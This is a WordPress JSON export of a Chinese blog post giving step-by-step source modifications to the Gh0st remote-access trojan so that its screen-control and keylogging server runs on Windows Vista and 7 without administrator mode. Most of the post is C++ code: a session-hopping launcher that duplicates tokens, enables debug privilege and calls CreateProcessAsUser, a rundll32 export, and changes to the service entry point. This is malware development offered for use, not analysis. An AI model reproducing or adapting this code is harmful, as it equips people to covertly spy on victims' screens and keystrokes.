{"id":104301,"date":"2021-09-18T22:29:19","date_gmt":"2021-09-18T14:29:19","guid":{"rendered":"https:\/\/www.keaglegz.com\/104301.html"},"modified":"2021-09-18T22:29:19","modified_gmt":"2021-09-18T14:29:19","slug":"gh0st%e5%b1%8f%e5%b9%95%e6%8e%a7%e5%88%b6%e9%94%ae%e7%9b%98%e8%ae%b0%e5%bd%95%e5%ae%8c%e7%be%8e%e6%94%af%e6%8c%81vista-win7","status":"publish","type":"post","link":"https:\/\/www.dongwubaike.cn\/fanhao\/104301.html","title":{"rendered":"Gh0st\u5c4f\u5e55\u63a7\u5236\u952e\u76d8\u8bb0\u5f55\u5b8c\u7f8e\u652f\u6301Vista Win7"},"content":{"rendered":"\n

\u4ee5\u524d\u7684\u8001\u6587\u7ae0\u4e86,\u505a\u4e0b\u8bb0\u5f55\u5427,\u8fd9\u4e24\u5929\u5e2e\u670b\u53cb\u6539\u4e00\u4e2aGh0st,\u5728\u6d4b\u8bd5Win7\u529f\u80fd\u7684\u65f6\u5019\u53d1\u73b0\u4ee5\u524d\u7f51\u4e0a\u516c\u5e03\u7684\u65b9\u6cd5\u4e0d\u662f\u5f88\u597d\u517c\u5bb9,\u867d\u7136\u5c4f\u5e55\u548c\u952e\u76d8\u8bb0\u5f55\u53ef\u4ee5\u7528,\u4f46\u662f\u4e0a\u7ebf\u901f\u5ea6\u5f88\u6162,\u800c\u4e14\u670d\u52a1\u7aef\u4e0d\u4f1a\u81ea\u5220\u9664.\u66f4\u91cd\u8981\u7684\u662f\u8fd8\u5f97\u7528\u7ba1\u7406\u5458\u6a21\u5f0f\u624d\u80fd\u8fd0\u884c,\u53cd\u590d\u627e\u8d44\u6599\u548c\u6d4b\u8bd5.\u7ec8\u4e8e\u89e3\u51b3\u4e86Gh0st\u5b8c\u7f8e\u517c\u5bb9Win7\u548cVista\u7684\u95ee\u9898,\u53cc\u51fb\u5c31\u53ef\u4ee5\u8fd0\u884c,\u6211\u5c3d\u91cf\u628a\u7b14\u8bb0\u5199\u7684\u8be6\u7ec6\u4e9b.\u5982\u679c\u8fd8\u6709\u670b\u53cb\u4e0d\u61c2\u7684\u8bdd\u5728\u8fd9\u91cc\u7559\u8a00,\u6211\u770b\u5230\u4f1a\u5c3d\u91cf\u5e2e\u5927\u5bb6\u89e3\u51b3.
\u6253\u5f00server\u7684until.cpp\u6587\u4ef6.\u5728\u6700\u540e\u9762#endif\u7684\u4e0a\u9762\u52a0\u4e0a\u4e0b\u5217\u4ee3\u7801<\/p>\n

DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand )  {  DWORD dwRet = 0;  PROCESS_INFORMATION pi;  STARTUPINFO si;    DWORD dwSessionId;  HANDLE hUserToken = NULL;  HANDLE hUserTokenDup = NULL;  HANDLE hPToken = NULL;  HANDLE hProcess = NULL;  DWORD dwCreationFlags;    HMODULE hInstKernel32 = NULL;  typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)();  WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL;    hInstKernel32 = LoadLibrary(\"Kernel32.dll\");    if (!hInstKernel32)  {  return FALSE;  }    WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,\"WTSGetActiveConsoleSessionId\");    \/\/ Log the client on to the local computer.  dwSessionId = WTSGetActiveConsoleSessionId();    do  {  WTSQueryUserToken( dwSessionId,&hUserToken );  dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;  ZeroMemory( &si, sizeof( STARTUPINFO ) );  si.cb= sizeof( STARTUPINFO );  si.lpDesktop = \"winsta0default\";  ZeroMemory( &pi, sizeof(pi) );  TOKEN_PRIVILEGES tp;  LUID luid;    if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY  | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID  | TOKEN_READ | TOKEN_WRITE, &hPToken ) )  {  dwRet = GetLastError();  break;  }  else;    if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) )  {  dwRet = GetLastError();  break;  }  else;  tp.PrivilegeCount =1;  tp.Privileges[0].Luid =luid;  tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;    if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) )  {  dwRet = GetLastError();  break;  }  else;    \/\/Adjust Token privilege  if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) )  {  dwRet = GetLastError();  break;  }  else;    if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) )  {  dwRet = GetLastError();  break;  }  else;    LPVOID pEnv =NULL;    DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL );  CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary(\"UserEnv.dll\"), \"CreateEnvironmentBlock\" );  if (!CreateEnvironmentBlock) break;    if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) )  {  dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;  }  else pEnv=NULL;    \/\/ Launch the process in the client's logon session.  if( CreateProcessAsUser( hUserTokenDup, \/\/ client's access token  NULL, \/\/ file to execute  lpCommand, \/\/ command line  NULL, \/\/ pointer to process SECURITY_ATTRIBUTES  NULL, \/\/ pointer to thread SECURITY_ATTRIBUTES  FALSE, \/\/ handles are not inheritable  dwCreationFlags,\/\/ creation flags  pEnv, \/\/ pointer to new environment block  NULL, \/\/ name of current directory  &si, \/\/ pointer to STARTUPINFO structure  &pi \/\/ receives information about new process  ) )  {  }  else  {  dwRet = GetLastError();  break;  }  }  while( 0 );    \/\/Perform All the Close Handles task  if( NULL != hUserToken )  {  CloseHandle( hUserToken );  }  else;    if( NULL != hUserTokenDup)  {  CloseHandle( hUserTokenDup );  }  else;  if( NULL != hPToken )  {  CloseHandle( hPToken );  }  else;  return dwRet;  }<\/pre>\n
\u7136\u540e\u6253\u5f00until.h \u540c\u6837\u5728\u6700\u540e\u9762\u7684#endif\u4e0a\u9762\u52a0\u4e0a<\/p>\n
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );<\/pre>\n
\u7136\u540e\u6253\u5f00svchost.cpp
 \u641c\u7d22<\/p>\n
extern \"C\" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )<\/pre>\n
\u5728\u4e0a\u9762\u52a0\u4e0a<\/p>\n
extern \"C\" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow )  {  main(lpCmdLine);  }<\/pre>\n
\u641c\u7d22 <\/p>\n
g_dwServiceType = QueryServiceTypeFromRegedit(svcname);<\/pre>\n
\u5728\u4e0b\u9762\u52a0\u4e0a<\/p>\n
HANDLE hThread = NULL;  OSVERSIONINFO OsVerInfoEx;  OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);  GetVersionEx(&OsVerInfoEx);  if ( OsVerInfoEx.dwMajorVersion < 6 )\/\/\u5224\u65ad\u90a3\u79cd\u7cfb\u7edf\uff0c\u5982\u679c\u5c0f\u4e8e6\uff0c\u76f4\u63a5\u7528\u539f\u6765\u7684\u4ee3\u7801  {  HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);  }  else  {  CHAR lpCommand[256];  CHAR Start[MAX_PATH];  GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));  wsprintf(lpCommand,\"rundll32.exe %s, XiaoDeBu %s\",Start, svcname );  LaunchAppIntoDifferentSession(lpCommand);  }<\/pre>\n
\u7136\u540e\u628a<\/p>\n
HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);<\/pre>\n
\u8fd9\u53e5\u6ce8\u91ca\u6389.<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4ee5\u524d\u7684\u8001\u6587\u7ae0\u4e86,\u505a\u4e0b\u8bb0\u5f55\u5427,\u8fd9\u4e24\u5929\u5e2e\u670b\u53cb\u6539\u4e00\u4e2aGh0st,\u5728\u6d4b\u8bd5Win7\u529f\u80fd\u7684\u65f6\u5019\u53d1\u73b0\u4ee5\u524d\u7f51\u4e0a\u516c\u5e03\u7684\u65b9\u6cd5\u4e0d\u662f\u5f88\u597d\u517c\u5bb9,\u867d\u7136\u5c4f\u5e55\u548c\u952e\u76d8\u8bb0\u5f55\u53ef\u4ee5\u7528,\u4f46\u662f\u4e0a\u7ebf\u901f\u5ea6\u5f88\u6162,\u800c\u4e14\u670d\u52a1\u7aef\u4e0d\u4f1a\u81ea\u5220\u9664.\u66f4\u91cd\u8981\u7684\u662f\u8fd8\u5f97\u7528\u7ba1\u7406\u5458\u6a21\u5f0f\u624d\u80fd\u8fd0\u884c,\u53cd\u590d\u627e\u8d44\u6599\u548c\u6d4b\u8bd5.\u7ec8\u4e8e\u89e3\u51b3\u4e86Gh0st\u5b8c\u7f8e\u517c\u5bb9Win7\u548cVista\u7684\u95ee\u9898,\u53cc\u51fb\u5c31\u53ef\u4ee5\u8fd0\u884c,\u6211\u5c3d\u91cf\u628a\u7b14\u8bb0\u5199\u7684\u8be6\u7ec6\u4e9b.\u5982\u679c\u8fd8\u6709\u670b\u53cb\u4e0d\u61c2\u7684\u8bdd\u5728\u8fd9\u91cc\u7559\u8a00,\u6211\u770b\u5230\u4f1a\u5c3d\u91cf\u5e2e\u5927\u5bb6\u89e3\u51b3.
\n \u6253\u5f00server\u7684until.cpp\u6587\u4ef6.\u5728\u6700\u540e\u9762#endif\u7684\u4e0a\u9762\u52a0\u4e0a\u4e0b\u5217\u4ee3\u7801<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-104301","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/posts\/104301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/comments?post=104301"}],"version-history":[{"count":0,"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/posts\/104301\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/media?parent=104301"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/categories?post=104301"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dongwubaike.cn\/fanhao\/wp-json\/wp\/v2\/tags?post=104301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}